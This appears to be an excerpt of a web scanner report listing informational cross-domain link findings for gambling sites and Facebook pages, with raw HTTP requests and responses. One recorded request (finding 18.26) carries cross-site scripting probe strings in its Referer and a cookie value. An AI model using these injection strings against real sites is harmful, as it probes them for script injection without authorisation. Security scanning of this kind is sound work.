GET /Home.aspx?LanguageCode=ENG HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:45 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:45 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:45 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:45 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:45 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/BigMoneyScratch/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
ards, Scratch off tickets, Flash Games, Play for free, Real Money Play, Amazing Promotions, New Player Bonus, Exclusive, VIP Rewards Club, Invite and Friend, Fun, Amazing Give always, BigMoneyScratch"><img src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/logo_ENG.jpg" border="0" alt="Worlds most exciting, Scratchcards, Scratch Cards, Scratch off tickets, Flash Games, Play for free, Real Money Play, Amazing Promotions, New Player Bonus, Exclusive, VIP Rewards Club, Invite and Friend, Fun, Amazing Give always, BigMoneyScratch" /></a>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/corner_tl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/corner_tl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/corner_tr.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/corner_bl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/corner_br.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/corner_tr.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell" valign="top"><img src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/corner_bl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell" valign="top"><img src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/corner_br.gif" alt="Select Language"></td>
...[SNIP]...
<a id="ctl00_cphHeader_objPageHeader_lnkMobile" class="HeaderLinks" href="Mobile.aspx" style="white-space: nowrap">
<img border="0" align="absmiddle" hspace="0" vspace="0" alt="Mobile" src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/mobile_icon.gif" /> Mobile</a>
...[SNIP]...
<td class="HeaderMenuRightCell" align="right"><img src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/MenuCorner.jpg" border="0" alt="" style="vertical-align:top;" /></td>
...[SNIP]...
<area onclick="try{WriteToAnalytics('ContactUs_ENG.gif');}catch(err){}" href="Mobile.aspx" alt="Mobile" coords="50,3,66,28" target="_self"/>
<area onclick="try{WriteToAnalytics('ContactUs_ENG.gif');}catch(err){}" href="http://www.facebook.com/pages/BigMoneyScratch/156518521055171" alt="Facebook" coords="106,3,132,28" target="_blank"/>
<area onclick="try{WriteToAnalytics('ContactUs_ENG.gif');}catch(err){}" href="ContactUsTel.aspx" alt="Tel" coords="10,105,62,154" target="_self"/>
...[SNIP]...
<td class="HomePageContentRightCell">
<img width="184px" height="128" alt="Worlds most exciting, Scratchcards, Scratch Cards, Scratch off tickets, Flash Games, Play for free, Real Money Play, Amazing Promotions, New Player Bonus, Exclusive, VIP Rewards Club, Invite and Friend, Fun, Amazing Give always, BigMoneyScratch" src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/Home/WinnersHeader_ENG_USD.jpg" />
<script type="text/javascript">
...[SNIP]...
</script>
<img width="184px" height="217" border="0" alt="Worlds most exciting, Scratchcards, Scratch Cards, Scratch off tickets, Flash Games, Play for free, Real Money Play, Amazing Promotions, New Player Bonus, Exclusive, VIP Rewards Club, Invite and Friend, Fun, Amazing Give always, BigMoneyScratch" src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/Home/ContactUs_ENG.gif" usemap="#ContactUsMapping" />
</td>
...[SNIP]...
<MAP NAME="footerMapping">
<area href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" alt="" coords="200,0,286,50" target="_blank" />
<area href="http://www.neogames.com/" alt="" coords="290,0,410,50" target="_blank" />
<area href="UnderAge.aspx" alt="" coords="414,0,450,50" />
<area href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf" alt="" coords="454,0,545,50" target="_blank" />
<area href="http://www.gamblersanonymous.org/" alt="" coords="554,0,620,50" target="_blank" />
<area href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" alt="" coords="625,0,780,50" target="_blank" />
</MAP>
...[SNIP]...
<td><img alt="Worlds most exciting, Scratchcards, Scratch Cards, Scratch off tickets, Flash Games, Play for free, Real Money Play, Amazing Promotions, New Player Bonus, Exclusive, VIP Rewards Club, Invite and Friend, Fun, Amazing Give always, BigMoneyScratch" border="0" src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/bottom.gif" USEMAP="#footerMapping" /></td>
...[SNIP]...
2007). The Company...s registered address is at 135, High street, Sliema SLM 1549, Malta. The Company operates BigMoneyScratch.com under a license issued and regulated by the
<a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" class="ContentLinks">
Lotteries and Gaming Authority
</a>
...[SNIP]...

18.23. http://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/?ref=ts

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/y8/r/WFXgtsTuqGq.css
http://b.static.ak.fbcdn.net/rsrc.php/v1/yL/r/LnZ1HDCjD4N.css
http://e.static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js
http://f.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/2xUG0B1QtMs.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png

Request

GET /?ref=ts HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTSnNr7_aB426uwgNhTYi; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=9diln; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F%3Fref%3Dts; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F%3Fref%3Dts; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.104.41
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 29884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/y8/r/WFXgtsTuqGq.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/2xUG0B1QtMs.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yL/r/LnZ1HDCjD4N.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<span id="async_status" class="async_status" style="display: none"><img class="img" src="http://f.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></span>
...[SNIP]...
<div id="recaptcha_loading">Loading... <img class="captcha_loading img" src="http://f.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" style="height:11px;width:16px;" /></div>
...[SNIP]...
<span id="captcha_async_status" class="async_status" style="display: none"><img class="img" src="http://f.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></span>
...[SNIP]...
<div id="progress_wrap"><img class="img" src="http://f.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /><div id="progress_msg">
...[SNIP]...

18.24. http://www.facebook.com/WinningsCom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/WinningsCom

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/WinningsCom?id=tb

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/y8/r/WFXgtsTuqGq.css
http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://c.static.ak.fbcdn.net/rsrc.php/v1/yu/r/Cx2s6uhEG36.css
http://e.static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js
http://e.static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico
http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/2xUG0B1QtMs.css
http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/40tZNLSoQrm.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png

Request

GET /WinningsCom?id=tb HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OhnRTeSZjl5Fn1flFpG8JJU9; expires=Wed, 15-May-2013 12:31:54 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=V8GN3; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.102.57
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 41751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/40tZNLSoQrm.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/y8/r/WFXgtsTuqGq.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/2xUG0B1QtMs.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/v1/yu/r/Cx2s6uhEG36.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...
<link rel="alternate" type="application/atom+xml" title="Winnings.com" href="feeds/page.php?id=127662903937630&format=atom10"/>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...

18.25. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?api_key=115813460972&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df369d8b3f%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&id=314888464487&locale=en_US&sdk=joey&show_faces=false&stream=false&width=292

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/41591_314888464487_7047_q.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/ZAHAqkTqkUj.css
http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/RJF4f9OXUL1.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

Response

18.26. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?api_key=115813460972&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfc208483563d2%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ffc9e99a80b4bc2%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&id=314888464487&locale=en_US&sdk=joey&show_faces=false&stream=false&width=292

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/41591_314888464487_7047_q.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/R9NKeEUZ860.css
http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js
http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/dDcIjg2q0Sp.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /plugins/likebox.php?api_key=115813460972&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfc208483563d2%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ffc9e99a80b4bc2%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&id=314888464487&locale=en_US&sdk=joey&show_faces=false&stream=false&width=292 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-; lsd=P0T0X; reg_ext_ref=http%3A%2F%2Fwww.primescratchcards.com%2Findex.asp%3Fcurr%3DUSD35af5%2527%253balert(document.location)%2F%2Fd13433ff10e%26g%3D3; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FPrimeScratchCards; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FPrimeScratchCards; wd=1137x805

Response

18.27. http://www.incomate.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.incomate.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.incomate.com/?sa=games

The response contains the following links to other domains:

http://landmark-project.com/feed2js/feed2js.php?src=http%3A%2F%2Fwww.casinogamblingweb.com%2Fgambling.xml&num=2&desc=100&targ=y&utf=y
http://www.kasino.com/
http://www.linkedin.com/company/790665

Request

GET /?sa=games HTTP/1.1
Host: www.incomate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: text/html
Last-Modified: Tue, 10 May 2011 20:56:31 GMT
Accept-Ranges: bytes
ETag: "3fb2fbd54fcc1:0",""
Server: Microsoft-IIS/7.5
Date: Mon, 16 May 2011 12:33:51 GMT
Connection: close
Content-Length: 15841

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<hea
...[SNIP]...
</a> -->
<a target="_blank" href="http://www.linkedin.com/company/790665"><img src="style/linkedin.jpg" alt="Go to Incomate LinkedIn profile"/>
...[SNIP]...
<div id="feed">
<script language="JavaScript" src="http://landmark-project.com/feed2js/feed2js.php?src=http%3A%2F%2Fwww.casinogamblingweb.com%2Fgambling.xml&num=2&desc=100&targ=y&utf=y" charset="UTF-8" type="text/javascript"></script>
...[SNIP]...
<i>Natalie, <a href='http://www.kasino.com/' target='_blank'>Kasino.com</a>
...[SNIP]...

18.28. http://www.info.crazyscratch.com/AboutUs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/AboutUs.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.info.crazyscratch.com/AboutUs.aspx?CurrencyCode=GBP

The response contains the following links to other domains:

http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico
http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf
http://www.crazyrewards.com/
http://www.gamblersanonymous.org/
http://www.neogames.com/
https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en

Request

GET /AboutUs.aspx?CurrencyCode=GBP HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:42 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:42 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:42 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:42 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:42 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 57132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/CrazyScratch/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<br />
<a class="ContentLinks" target="_blank" href="http://www.gamblersanonymous.org">www.gamblersanonymous.org</a>
...[SNIP]...
<a onclick="OpenLobby();" href="#"><img alt="" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif" style="border: none" /></a>
...[SNIP]...
</a>
| <a href="http://www.crazyrewards.com" rel="nofollow">Affiliates</a>
...[SNIP]...
<map name="Map" id="Map">
<area shape="rect" coords="68,2,142,33" href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" target="_blank" alt="Verisign" rel="nofollow"/>
<area shape="rect" coords="288,3,432,32" href="http://www.neogames.com/" target="_blank" alt="Neogames" rel="nofollow"/>
<area shape="rect" coords="2,2,48,33" href="http://www.info.crazyscratch.com/UnderAge.aspx?CurrencyCode=GBP" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="171,2,261,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf" target="_blank" alt="ItechLabs tested" rel="nofollow"/>
<area shape="rect" coords="468,2,539,33" href="http://www.gamblersanonymous.org/" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="565,2,696,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" alt="LGA Malta" rel="nofollow"/>
</map>
...[SNIP]...
ta (a member of the EU since May 2007). The Company...s registered address is at 135 High Street, Sliema, Malta. The Company operates crazyscratch.com under a license issued and regulated by the <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank"> Lotteries and Gaming Authority </a>
...[SNIP]...

18.29. http://www.info.crazyscratch.com/ContactUsMail.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/ContactUsMail.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.info.crazyscratch.com/ContactUsMail.aspx?CurrencyCode=GBP

The response contains the following links to other domains:

http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf
http://www.crazyrewards.com/
http://www.gamblersanonymous.org/
http://www.neogames.com/
https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en

Request

GET /ContactUsMail.aspx?CurrencyCode=GBP HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:28 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:28 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:28 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:28 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:28 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 62148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/CrazyScratch/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
</a>
| <a href="http://www.crazyrewards.com" rel="nofollow">Affiliates</a>
...[SNIP]...
<map name="Map" id="Map">
<area shape="rect" coords="68,2,142,33" href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" target="_blank" alt="Verisign" rel="nofollow"/>
<area shape="rect" coords="288,3,432,32" href="http://www.neogames.com/" target="_blank" alt="Neogames" rel="nofollow"/>
<area shape="rect" coords="2,2,48,33" href="http://www.info.crazyscratch.com/UnderAge.aspx?CurrencyCode=GBP" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="171,2,261,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf" target="_blank" alt="ItechLabs tested" rel="nofollow"/>
<area shape="rect" coords="468,2,539,33" href="http://www.gamblersanonymous.org/" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="565,2,696,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" alt="LGA Malta" rel="nofollow"/>
</map>
...[SNIP]...
ta (a member of the EU since May 2007). The Company...s registered address is at 135 High Street, Sliema, Malta. The Company operates crazyscratch.com under a license issued and regulated by the <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank"> Lotteries and Gaming Authority </a>
...[SNIP]...

18.30. http://www.info.crazyscratch.com/FairPlay.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/FairPlay.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.info.crazyscratch.com/FairPlay.aspx?CurrencyCode=GBP

The response contains the following links to other domains:

